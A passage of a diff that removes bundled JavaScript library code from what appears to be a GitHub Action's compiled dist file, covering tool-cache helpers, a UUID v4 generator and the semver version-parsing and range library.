RUNNER_TOOL_CACHE to be defined'); - return cacheDirectory; -} -/** - * Gets RUNNER_TEMP - */ -function _getTempDirectory() { - const tempDirectory = process.env['RUNNER_TEMP'] || ''; - assert_1.ok(tempDirectory, 'Expected RUNNER_TEMP to be defined'); - return tempDirectory; -} -/** - * Gets a global variable - */ -function _getGlobal(key, defaultValue) { - /* eslint-disable @typescript-eslint/no-explicit-any */ - const value = global[key]; - /* eslint-enable @typescript-eslint/no-explicit-any */ - return value !== undefined ? value : defaultValue; -} -/** - * Returns an array of unique values. - * @param values Values to make unique. - */ -function _unique(values) { - return Array.from(new Set(values)); -} -//# sourceMappingURL=tool-cache.js.map - -/***/ }), - -/***/ 7701: -/***/ ((module) => { - -/** - * Convert array of 16 byte values to UUID string format of the form: - * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX - */ -var byteToHex = []; -for (var i = 0; i < 256; ++i) { - byteToHex[i] = (i + 0x100).toString(16).substr(1); -} - -function bytesToUuid(buf, offset) { - var i = offset || 0; - var bth = byteToHex; - // join used to fix memory issue caused by concatenation: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4 - return ([ - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], '-', - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]], - bth[buf[i++]], bth[buf[i++]] - ]).join(''); -} - -module.exports = bytesToUuid; - - -/***/ }), - -/***/ 7269: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -// Unique ID creation requires a high quality random # generator. In node.js -// this is pretty straight-forward - we use the crypto API. - -var crypto = __nccwpck_require__(6113); - -module.exports = function nodeRNG() { - return crypto.randomBytes(16); -}; - - -/***/ }), - -/***/ 7468: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -var rng = __nccwpck_require__(7269); -var bytesToUuid = __nccwpck_require__(7701); - -function v4(options, buf, offset) { - var i = buf && offset || 0; - - if (typeof(options) == 'string') { - buf = options === 'binary' ? new Array(16) : null; - options = null; - } - options = options || {}; - - var rnds = options.random || (options.rng || rng)(); - - // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` - rnds[6] = (rnds[6] & 0x0f) | 0x40; - rnds[8] = (rnds[8] & 0x3f) | 0x80; - - // Copy bytes to buffer, if provided - if (buf) { - for (var ii = 0; ii < 16; ++ii) { - buf[i + ii] = rnds[ii]; - } - } - - return buf || bytesToUuid(rnds); -} - -module.exports = v4; - - -/***/ }), - -/***/ 5911: -/***/ ((module, exports) => { - -exports = module.exports = SemVer - -var debug -/* istanbul ignore next */ -if (typeof process === 'object' && - process.env && - process.env.NODE_DEBUG && - /\bsemver\b/i.test(process.env.NODE_DEBUG)) { - debug = function () { - var args = Array.prototype.slice.call(arguments, 0) - args.unshift('SEMVER') - console.log.apply(console, args) - } -} else { - debug = function () {} -} - -// Note: this is the semver.org version of the spec that it implements -// Not necessarily the package version of this code. -exports.SEMVER_SPEC_VERSION = '2.0.0' - -var MAX_LENGTH = 256 -var MAX_SAFE_INTEGER = Number.MAX_SAFE_INTEGER || - /* istanbul ignore next */ 9007199254740991 - -// Max safe segment length for coercion. -var MAX_SAFE_COMPONENT_LENGTH = 16 - -var MAX_SAFE_BUILD_LENGTH = MAX_LENGTH - 6 - -// The actual regexps go on exports.re -var re = exports.re = [] -var safeRe = exports.safeRe = [] -var src = exports.src = [] -var t = exports.tokens = {} -var R = 0 - -function tok (n) { - t[n] = R++ -} - -var LETTERDASHNUMBER = '[a-zA-Z0-9-]' - -// Replace some greedy regex tokens to prevent regex dos issues. These regex are -// used internally via the safeRe object since all inputs in this library get -// normalized first to trim and collapse all extra whitespace. The original -// regexes are exported for userland consumption and lower level usage. A -// future breaking change could export the safer regex only with a note that -// all input should have extra whitespace removed. -var safeRegexReplacements = [ - ['\\s', 1], - ['\\d', MAX_LENGTH], - [LETTERDASHNUMBER, MAX_SAFE_BUILD_LENGTH], -] - -function makeSafeRe (value) { - for (var i = 0; i < safeRegexReplacements.length; i++) { - var token = safeRegexReplacements[i][0] - var max = safeRegexReplacements[i][1] - value = value - .split(token + '*').join(token + '{0,' + max + '}') - .split(token + '+').join(token + '{1,' + max + '}') - } - return value -} - -// The following Regular Expressions can be used for tokenizing, -// validating, and parsing SemVer version strings. - -// ## Numeric Identifier -// A single `0`, or a non-zero digit followed by zero or more digits. - -tok('NUMERICIDENTIFIER') -src[t.NUMERICIDENTIFIER] = '0|[1-9]\\d*' -tok('NUMERICIDENTIFIERLOOSE') -src[t.NUMERICIDENTIFIERLOOSE] = '\\d+' - -// ## Non-numeric Identifier -// Zero or more digits, followed by a letter or hyphen, and then zero or -// more letters, digits, or hyphens. - -tok('NONNUMERICIDENTIFIER') -src[t.NONNUMERICIDENTIFIER] = '\\d*[a-zA-Z-]' + LETTERDASHNUMBER + '*' - -// ## Main Version -// Three dot-separated numeric identifiers. - -tok('MAINVERSION') -src[t.MAINVERSION] = '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIER] + ')' - -tok('MAINVERSIONLOOSE') -src[t.MAINVERSIONLOOSE] = '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')\\.' + - '(' + src[t.NUMERICIDENTIFIERLOOSE] + ')' - -// ## Pre-release Version Identifier -// A numeric identifier, or a non-numeric identifier. - -tok('PRERELEASEIDENTIFIER') -src[t.PRERELEASEIDENTIFIER] = '(?:' + src[t.NUMERICIDENTIFIER] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -tok('PRERELEASEIDENTIFIERLOOSE') -src[t.PRERELEASEIDENTIFIERLOOSE] = '(?:' + src[t.NUMERICIDENTIFIERLOOSE] + - '|' + src[t.NONNUMERICIDENTIFIER] + ')' - -// ## Pre-release Version -// Hyphen, followed by one or more dot-separated pre-release version -// identifiers. - -tok('PRERELEASE') -src[t.PRERELEASE] = '(?:-(' + src[t.PRERELEASEIDENTIFIER] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIER] + ')*))' - -tok('PRERELEASELOOSE') -src[t.PRERELEASELOOSE] = '(?:-?(' + src[t.PRERELEASEIDENTIFIERLOOSE] + - '(?:\\.' + src[t.PRERELEASEIDENTIFIERLOOSE] + ')*))' - -// ## Build Metadata Identifier -// Any combination of digits, letters, or hyphens. - -tok('BUILDIDENTIFIER') -src[t.BUILDIDENTIFIER] = LETTERDASHNUMBER + '+' - -// ## Build Metadata -// Plus sign, followed by one or more period-separated build metadata -// identifiers. - -tok('BUILD') -src[t.BUILD] = '(?:\\+(' + src[t.BUILDIDENTIFIER] + - '(?:\\.' + src[t.BUILDIDENTIFIER] + ')*))' - -// ## Full Version String -// A main version, followed optionally by a pre-release version and -// build metadata. - -// Note that the only major, minor, patch, and pre-release sections of -// the version string are capturing groups. The build metadata is not a -// capturing group, because it should not ever be used in version -// comparison. - -tok('FULL') -tok('FULLPLAIN') -src[t.FULLPLAIN] = 'v?' + src[t.MAINVERSION] + - src[t.PRERELEASE] + '?' + - src[t.BUILD] + '?' - -src[t.FULL] = '^' + src[t.FULLPLAIN] + '$' - -// like full, but allows v1.2.3 and =1.2.3, which people do sometimes. -// also, 1.0.0alpha1 (prerelease without the hyphen) which is pretty -// common in the npm registry. -tok('LOOSEPLAIN') -src[t.LOOSEPLAIN] = '[v=\\s]*' + src[t.MAINVERSIONLOOSE] + - src[t.PRERELEASELOOSE] + '?' + - src[t.BUILD] + '?' - -tok('LOOSE') -src[t.LOOSE] = '^' + src[t.LOOSEPLAIN] + '$' - -tok('GTLT') -src[t.GTLT] = '((?:<|>)?=?)' - -// Something like "2.*" or "1.2.x". -// Note that "x.x" is a valid xRange identifer, meaning "any version" -// Only the first item is strictly required. -tok('XRANGEIDENTIFIERLOOSE') -src[t.XRANGEIDENTIFIERLOOSE] = src[t.NUMERICIDENTIFIERLOOSE] + '|x|X|\\*' -tok('XRANGEIDENTIFIER') -src[t.XRANGEIDENTIFIER] = src[t.NUMERICIDENTIFIER] + '|x|X|\\*' - -tok('XRANGEPLAIN') -src[t.XRANGEPLAIN] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIER] + ')' + - '(?:' + src[t.PRERELEASE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGEPLAINLOOSE') -src[t.XRANGEPLAINLOOSE] = '[v=\\s]*(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:\\.(' + src[t.XRANGEIDENTIFIERLOOSE] + ')' + - '(?:' + src[t.PRERELEASELOOSE] + ')?' + - src[t.BUILD] + '?' + - ')?)?' - -tok('XRANGE') -src[t.XRANGE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAIN] + '$' -tok('XRANGELOOSE') -src[t.XRANGELOOSE] = '^' + src[t.GTLT] + '\\s*' + src[t.XRANGEPLAINLOOSE] + '$' - -// Coercion. -// Extract anything that could conceivably be a part of a valid semver -tok('COERCE') -src[t.COERCE] = '(^|[^\\d])' + - '(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '})' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:\\.(\\d{1,' + MAX_SAFE_COMPONENT_LENGTH + '}))?' + - '(?:$|[^\\d])' -tok('COERCERTL') -re[t.COERCERTL] = new RegExp(src[t.COERCE], 'g') -safeRe[t.COERCERTL] = new RegExp(makeSafeRe(src[t.COERCE]), 'g') - -// Tilde ranges. -// Meaning is "reasonably at or greater than" -tok('LONETILDE') -src[t.LONETILDE] = '(?:~>?)' - -tok('TILDETRIM') -src[t.TILDETRIM] = '(\\s*)' + src[t.LONETILDE] + '\\s+' -re[t.TILDETRIM] = new RegExp(src[t.TILDETRIM], 'g') -safeRe[t.TILDETRIM] = new RegExp(makeSafeRe(src[t.TILDETRIM]), 'g') -var tildeTrimReplace = '$1~' - -tok('TILDE') -src[t.TILDE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAIN] + '$' -tok('TILDELOOSE') -src[t.TILDELOOSE] = '^' + src[t.LONETILDE] + src[t.XRANGEPLAINLOOSE] + '$' - -// Caret ranges. -// Meaning is "at least and backwards compatible with" -tok('LONECARET') -src[t.LONECARET] = '(?:\\^)' - -tok('CARETTRIM') -src[t.CARETTRIM] = '(\\s*)' + src[t.LONECARET] + '\\s+' -re[t.CARETTRIM] = new RegExp(src[t.CARETTRIM], 'g') -safeRe[t.CARETTRIM] = new RegExp(makeSafeRe(src[t.CARETTRIM]), 'g') -var caretTrimReplace = '$1^' - -tok('CARET') -src[t.CARET] = '^' + src[t.LONECARET] + src[t.XRANGEPLAIN] + '$' -tok('CARETLOOSE') -src[t.CARETLOOSE] = '^' + src[t.LONECARET] + src[t.XRANGEPLAINLOOSE] + '$' - -// A simple gt/lt/eq thing, or just "" to indicate "any version" -tok('COMPARATORLOOSE') -src[t.COMPARATORLOOSE] = '^' + src[t.GTLT] + '\\s*(' + src[t.LOOSEPLAIN] + ')$|^$' -tok('COMPARATOR') -src[t.COMPARATOR] = '^' + src[t.GTLT] + '\\s*(' + src[t.FULLPLAIN] + ')$|^$' - -// An expression to strip any whitespace between the gtlt and the thing -// it modifies, so that `> 1.2.3` ==> `>1.2.3` -tok('COMPARATORTRIM') -src[t.COMPARATORTRIM] = '(\\s*)' + src[t.GTLT] + - '\\s*(' + src[t.LOOSEPLAIN] + '|' + src[t.XRANGEPLAIN] + ')' - -// this one has to use the /g flag -re[t.COMPARATORTRIM] = new RegExp(src[t.COMPARATORTRIM], 'g') -safeRe[t.COMPARATORTRIM] = new RegExp(makeSafeRe(src[t.COMPARATORTRIM]), 'g') -var comparatorTrimReplace = '$1$2$3' - -// Something like `1.2.3 - 1.2.4` -// Note that these all use the loose form, because they'll be -// checked against either the strict or loose comparator form -// later. -tok('HYPHENRANGE') -src[t.HYPHENRANGE] = '^\\s*(' + src[t.XRANGEPLAIN] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAIN] + ')' + - '\\s*$' - -tok('HYPHENRANGELOOSE') -src[t.HYPHENRANGELOOSE] = '^\\s*(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s+-\\s+' + - '(' + src[t.XRANGEPLAINLOOSE] + ')' + - '\\s*$' - -// Star ranges basically just allow anything at all. -tok('STAR') -src[t.STAR] = '(<|>)?=?\\s*\\*' - -// Compile to actual regexp objects. -// All are flag-free, unless they were created above with a flag. -for (var i = 0; i < R; i++) { - debug(i, src[i]) - if (!re[i]) { - re[i] = new RegExp(src[i]) - - // Replace all greedy whitespace to prevent regex dos issues. These regex are - // used internally via the safeRe object since all inputs in this library get - // normalized first to trim and collapse all extra whitespace. The original - // regexes are exported for userland consumption and lower level usage. A - // future breaking change could export the safer regex only with a note that - // all input should have extra whitespace removed. - safeRe[i] = new RegExp(makeSafeRe(src[i])) - } -} - -exports.parse = parse -function parse (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (version instanceof SemVer) { - return version - } - - if (typeof version !== 'string') { - return null - } - - if (version.length > MAX_LENGTH) { - return null - } - - var r = options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL] - if (!r.test(version)) { - return null - } - - try { - return new SemVer(version, options) - } catch (er) { - return null - } -} - -exports.valid = valid -function valid (version, options) { - var v = parse(version, options) - return v ? v.version : null -} - -exports.clean = clean -function clean (version, options) { - var s = parse(version.trim().replace(/^[=v]+/, ''), options) - return s ? s.version : null -} - -exports.SemVer = SemVer - -function SemVer (version, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - if (version instanceof SemVer) { - if (version.loose === options.loose) { - return version - } else { - version = version.version - } - } else if (typeof version !== 'string') { - throw new TypeError('Invalid Version: ' + version) - } - - if (version.length > MAX_LENGTH) { - throw new TypeError('version is longer than ' + MAX_LENGTH + ' characters') - } - - if (!(this instanceof SemVer)) { - return new SemVer(version, options) - } - - debug('SemVer', version, options) - this.options = options - this.loose = !!options.loose - - var m = version.trim().match(options.loose ? safeRe[t.LOOSE] : safeRe[t.FULL]) - - if (!m) { - throw new TypeError('Invalid Version: ' + version) - } - - this.raw = version - - // these are actually numbers - this.major = +m[1] - this.minor = +m[2] - this.patch = +m[3] - - if (this.major > MAX_SAFE_INTEGER || this.major < 0) { - throw new TypeError('Invalid major version') - } - - if (this.minor > MAX_SAFE_INTEGER || this.minor < 0) { - throw new TypeError('Invalid minor version') - } - - if (this.patch > MAX_SAFE_INTEGER || this.patch < 0) { - throw new TypeError('Invalid patch version') - } - - // numberify any prerelease numeric ids - if (!m[4]) { - this.prerelease = [] - } else { - this.prerelease = m[4].split('.').map(function (id) { - if (/^[0-9]+$/.test(id)) { - var num = +id - if (num >= 0 && num < MAX_SAFE_INTEGER) { - return num - } - } - return id - }) - } - - this.build = m[5] ? m[5].split('.') : [] - this.format() -} - -SemVer.prototype.format = function () { - this.version = this.major + '.' + this.minor + '.' + this.patch - if (this.prerelease.length) { - this.version += '-' + this.prerelease.join('.') - } - return this.version -} - -SemVer.prototype.toString = function () { - return this.version -} - -SemVer.prototype.compare = function (other) { - debug('SemVer.compare', this.version, this.options, other) - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return this.compareMain(other) || this.comparePre(other) -} - -SemVer.prototype.compareMain = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - return compareIdentifiers(this.major, other.major) || - compareIdentifiers(this.minor, other.minor) || - compareIdentifiers(this.patch, other.patch) -} - -SemVer.prototype.comparePre = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - // NOT having a prerelease is > having one - if (this.prerelease.length && !other.prerelease.length) { - return -1 - } else if (!this.prerelease.length && other.prerelease.length) { - return 1 - } else if (!this.prerelease.length && !other.prerelease.length) { - return 0 - } - - var i = 0 - do { - var a = this.prerelease[i] - var b = other.prerelease[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -SemVer.prototype.compareBuild = function (other) { - if (!(other instanceof SemVer)) { - other = new SemVer(other, this.options) - } - - var i = 0 - do { - var a = this.build[i] - var b = other.build[i] - debug('prerelease compare', i, a, b) - if (a === undefined && b === undefined) { - return 0 - } else if (b === undefined) { - return 1 - } else if (a === undefined) { - return -1 - } else if (a === b) { - continue - } else { - return compareIdentifiers(a, b) - } - } while (++i) -} - -// preminor will bump the version up to the next minor release, and immediately -// down to pre-release. premajor and prepatch work the same way. -SemVer.prototype.inc = function (release, identifier) { - switch (release) { - case 'premajor': - this.prerelease.length = 0 - this.patch = 0 - this.minor = 0 - this.major++ - this.inc('pre', identifier) - break - case 'preminor': - this.prerelease.length = 0 - this.patch = 0 - this.minor++ - this.inc('pre', identifier) - break - case 'prepatch': - // If this is already a prerelease, it will bump to the next version - // drop any prereleases that might already exist, since they are not - // relevant at this point. - this.prerelease.length = 0 - this.inc('patch', identifier) - this.inc('pre', identifier) - break - // If the input is a non-prerelease version, this acts the same as - // prepatch. - case 'prerelease': - if (this.prerelease.length === 0) { - this.inc('patch', identifier) - } - this.inc('pre', identifier) - break - - case 'major': - // If this is a pre-major version, bump up to the same major version. - // Otherwise increment major. - // 1.0.0-5 bumps to 1.0.0 - // 1.1.0 bumps to 2.0.0 - if (this.minor !== 0 || - this.patch !== 0 || - this.prerelease.length === 0) { - this.major++ - } - this.minor = 0 - this.patch = 0 - this.prerelease = [] - break - case 'minor': - // If this is a pre-minor version, bump up to the same minor version. - // Otherwise increment minor. - // 1.2.0-5 bumps to 1.2.0 - // 1.2.1 bumps to 1.3.0 - if (this.patch !== 0 || this.prerelease.length === 0) { - this.minor++ - } - this.patch = 0 - this.prerelease = [] - break - case 'patch': - // If this is not a pre-release version, it will increment the patch. - // If it is a pre-release it will bump up to the same patch version. - // 1.2.0-5 patches to 1.2.0 - // 1.2.0 patches to 1.2.1 - if (this.prerelease.length === 0) { - this.patch++ - } - this.prerelease = [] - break - // This probably shouldn't be used publicly. - // 1.0.0 "pre" would become 1.0.0-0 which is the wrong direction. - case 'pre': - if (this.prerelease.length === 0) { - this.prerelease = [0] - } else { - var i = this.prerelease.length - while (--i >= 0) { - if (typeof this.prerelease[i] === 'number') { - this.prerelease[i]++ - i = -2 - } - } - if (i === -1) { - // didn't increment anything - this.prerelease.push(0) - } - } - if (identifier) { - // 1.2.0-beta.1 bumps to 1.2.0-beta.2, - // 1.2.0-beta.fooblz or 1.2.0-beta bumps to 1.2.0-beta.0 - if (this.prerelease[0] === identifier) { - if (isNaN(this.prerelease[1])) { - this.prerelease = [identifier, 0] - } - } else { - this.prerelease = [identifier, 0] - } - } - break - - default: - throw new Error('invalid increment argument: ' + release) - } - this.format() - this.raw = this.version - return this -} - -exports.inc = inc -function inc (version, release, loose, identifier) { - if (typeof (loose) === 'string') { - identifier = loose - loose = undefined - } - - try { - return new SemVer(version, loose).inc(release, identifier).version - } catch (er) { - return null - } -} - -exports.diff = diff -function diff (version1, version2) { - if (eq(version1, version2)) { - return null - } else { - var v1 = parse(version1) - var v2 = parse(version2) - var prefix = '' - if (v1.prerelease.length || v2.prerelease.length) { - prefix = 'pre' - var defaultResult = 'prerelease' - } - for (var key in v1) { - if (key === 'major' || key === 'minor' || key === 'patch') { - if (v1[key] !== v2[key]) { - return prefix + key - } - } - } - return defaultResult // may be undefined - } -} - -exports.compareIdentifiers = compareIdentifiers - -var numeric = /^[0-9]+$/ -function compareIdentifiers (a, b) { - var anum = numeric.test(a) - var bnum = numeric.test(b) - - if (anum && bnum) { - a = +a - b = +b - } - - return a === b ? 0 - : (anum && !bnum) ? -1 - : (bnum && !anum) ? 1 - : a < b ? -1 - : 1 -} - -exports.rcompareIdentifiers = rcompareIdentifiers -function rcompareIdentifiers (a, b) { - return compareIdentifiers(b, a) -} - -exports.major = major -function major (a, loose) { - return new SemVer(a, loose).major -} - -exports.minor = minor -function minor (a, loose) { - return new SemVer(a, loose).minor -} - -exports.patch = patch -function patch (a, loose) { - return new SemVer(a, loose).patch -} - -exports.compare = compare -function compare (a, b, loose) { - return new SemVer(a, loose).compare(new SemVer(b, loose)) -} - -exports.compareLoose = compareLoose -function compareLoose (a, b) { - return compare(a, b, true) -} - -exports.compareBuild = compareBuild -function compareBuild (a, b, loose) { - var versionA = new SemVer(a, loose) - var versionB = new SemVer(b, loose) - return versionA.compare(versionB) || versionA.compareBuild(versionB) -} - -exports.rcompare = rcompare -function rcompare (a, b, loose) { - return compare(b, a, loose) -} - -exports.sort = sort -function sort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(a, b, loose) - }) -} - -exports.rsort = rsort -function rsort (list, loose) { - return list.sort(function (a, b) { - return exports.compareBuild(b, a, loose) - }) -} - -exports.gt = gt -function gt (a, b, loose) { - return compare(a, b, loose) > 0 -} - -exports.lt = lt -function lt (a, b, loose) { - return compare(a, b, loose) < 0 -} - -exports.eq = eq -function eq (a, b, loose) { - return compare(a, b, loose) === 0 -} - -exports.neq = neq -function neq (a, b, loose) { - return compare(a, b, loose) !== 0 -} - -exports.gte = gte -function gte (a, b, loose) { - return compare(a, b, loose) >= 0 -} - -exports.lte = lte -function lte (a, b, loose) { - return compare(a, b, loose) <= 0 -} - -exports.cmp = cmp -function cmp (a, op, b, loose) { - switch (op) { - case '===': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a === b - - case '!==': - if (typeof a === 'object') - a = a.version - if (typeof b === 'object') - b = b.version - return a !== b - - case '': - case '=': - case '==': - return eq(a, b, loose) - - case '!=': - return neq(a, b, loose) - - case '>': - return gt(a, b, loose) - - case '>=': - return gte(a, b, loose) - - case '<': - return lt(a, b, loose) - - case '<=': - return lte(a, b, loose) - - default: - throw new TypeError('Invalid operator: ' + op) - } -} - -exports.Comparator = Comparator -function Comparator (comp, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (comp instanceof Comparator) { - if (comp.loose === !!options.loose) { - return comp - } else { - comp = comp.value - } - } - - if (!(this instanceof Comparator)) { - return new Comparator(comp, options) - } - - comp = comp.trim().split(/\s+/).join(' ') - debug('comparator', comp, options) - this.options = options - this.loose = !!options.loose - this.parse(comp) - - if (this.semver === ANY) { - this.value = '' - } else { - this.value = this.operator + this.semver.version - } - - debug('comp', this) -} - -var ANY = {} -Comparator.prototype.parse = function (comp) { - var r = this.options.loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var m = comp.match(r) - - if (!m) { - throw new TypeError('Invalid comparator: ' + comp) - } - - this.operator = m[1] !== undefined ? m[1] : '' - if (this.operator === '=') { - this.operator = '' - } - - // if it literally is just '>' or '' then allow anything. - if (!m[2]) { - this.semver = ANY - } else { - this.semver = new SemVer(m[2], this.options.loose) - } -} - -Comparator.prototype.toString = function () { - return this.value -} - -Comparator.prototype.test = function (version) { - debug('Comparator.test', version, this.options.loose) - - if (this.semver === ANY || version === ANY) { - return true - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - return cmp(version, this.operator, this.semver, this.options) -} - -Comparator.prototype.intersects = function (comp, options) { - if (!(comp instanceof Comparator)) { - throw new TypeError('a Comparator is required') - } - - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - var rangeTmp - - if (this.operator === '') { - if (this.value === '') { - return true - } - rangeTmp = new Range(comp.value, options) - return satisfies(this.value, rangeTmp, options) - } else if (comp.operator === '') { - if (comp.value === '') { - return true - } - rangeTmp = new Range(this.value, options) - return satisfies(comp.semver, rangeTmp, options) - } - - var sameDirectionIncreasing = - (this.operator === '>=' || this.operator === '>') && - (comp.operator === '>=' || comp.operator === '>') - var sameDirectionDecreasing = - (this.operator === '<=' || this.operator === '<') && - (comp.operator === '<=' || comp.operator === '<') - var sameSemVer = this.semver.version === comp.semver.version - var differentDirectionsInclusive = - (this.operator === '>=' || this.operator === '<=') && - (comp.operator === '>=' || comp.operator === '<=') - var oppositeDirectionsLessThan = - cmp(this.semver, '<', comp.semver, options) && - ((this.operator === '>=' || this.operator === '>') && - (comp.operator === '<=' || comp.operator === '<')) - var oppositeDirectionsGreaterThan = - cmp(this.semver, '>', comp.semver, options) && - ((this.operator === '<=' || this.operator === '<') && - (comp.operator === '>=' || comp.operator === '>')) - - return sameDirectionIncreasing || sameDirectionDecreasing || - (sameSemVer && differentDirectionsInclusive) || - oppositeDirectionsLessThan || oppositeDirectionsGreaterThan -} - -exports.Range = Range -function Range (range, options) { - if (!options || typeof options !== 'object') { - options = { - loose: !!options, - includePrerelease: false - } - } - - if (range instanceof Range) { - if (range.loose === !!options.loose && - range.includePrerelease === !!options.includePrerelease) { - return range - } else { - return new Range(range.raw, options) - } - } - - if (range instanceof Comparator) { - return new Range(range.value, options) - } - - if (!(this instanceof Range)) { - return new Range(range, options) - } - - this.options = options - this.loose = !!options.loose - this.includePrerelease = !!options.includePrerelease - - // First reduce all whitespace as much as possible so we do not have to rely - // on potentially slow regexes like \s*. This is then stored and used for - // future error messages as well. - this.raw = range - .trim() - .split(/\s+/) - .join(' ') - - // First, split based on boolean or || - this.set = this.raw.split('||').map(function (range) { - return this.parseRange(range.trim()) - }, this).filter(function (c) { - // throw out any that are not relevant for whatever reason - return c.length - }) - - if (!this.set.length) { - throw new TypeError('Invalid SemVer Range: ' + this.raw) - } - - this.format() -} - -Range.prototype.format = function () { - this.range = this.set.map(function (comps) { - return comps.join(' ').trim() - }).join('||').trim() - return this.range -} - -Range.prototype.toString = function () { - return this.range -} - -Range.prototype.parseRange = function (range) { - var loose = this.options.loose - // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` - var hr = loose ? safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] - range = range.replace(hr, hyphenReplace) - debug('hyphen replace', range) - // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` - range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) - debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) - - // `~ 1.2.3` => `~1.2.3` - range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) - - // `^ 1.2.3` => `^1.2.3` - range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) - - // normalize spaces - range = range.split(/\s+/).join(' ') - - // At this point, the range is completely trimmed and - // ready to be split into comparators. - - var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var set = range.split(' ').map(function (comp) { - return parseComparator(comp, this.options) - }, this).join(' ').split(/\s+/) - if (this.options.loose) { - // in loose mode, throw out any that are not valid comparators - set = set.filter(function (comp) { - return !!comp.match(compRe) - }) - } - set = set.map(function (comp) { - return new Comparator(comp, this.options) - }, this) - - return set -} - -Range.prototype.intersects = function (range, options) { - if (!(range instanceof Range)) { - throw new TypeError('a Range is required') - } - - return this.set.some(function (thisComparators) { - return ( - isSatisfiable(thisComparators, options) && - range.set.some(function (rangeComparators) { - return ( - isSatisfiable(rangeComparators, options) && - thisComparators.every(function (thisComparator) { - return rangeComparators.every(function (rangeComparator) { - return thisComparator.intersects(rangeComparator, options) - }) - }) - ) - }) - ) - }) -} - -// take a set of comparators and determine whether there -// exists a version which can satisfy it -function isSatisfiable (comparators, options) { - var result = true - var remainingComparators = comparators.slice() - var testComparator = remainingComparators.pop() - - while (result && remainingComparators.length) { - result = remainingComparators.every(function (otherComparator) { - return testComparator.intersects(otherComparator, options) - }) - - testComparator = remainingComparators.pop() - } - - return result -} - -// Mostly just for testing and legacy API reasons -exports.toComparators = toComparators -function toComparators (range, options) { - return new Range(range, options).set.map(function (comp) { - return comp.map(function (c) { - return c.value - }).join(' ').trim().split(' ') - }) -} - -// comprised of xranges, tildes, stars, and gtlt's at this point. -// already replaced the hyphen ranges -// turn into a set of JUST comparators. -function parseComparator (comp, options) { - debug('comp', comp, options) - comp = replaceCarets(comp, options) - debug('caret', comp) - comp = replaceTildes(comp, options) - debug('tildes', comp) - comp = replaceXRanges(comp, options) - debug('xrange', comp) - comp = replaceStars(comp, options) - debug('stars', comp) - return comp -} - -function isX (id) { - return !id || id.toLowerCase() === 'x' || id === '*' -} - -// ~, ~> --> * (any, kinda silly) -// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 -// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 -// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 -// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 -// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 -function replaceTildes (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceTilde(comp, options) - }).join(' ') -} - -function replaceTilde (comp, options) { - var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] - return comp.replace(r, function (_, M, m, p, pr) { - debug('tilde', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 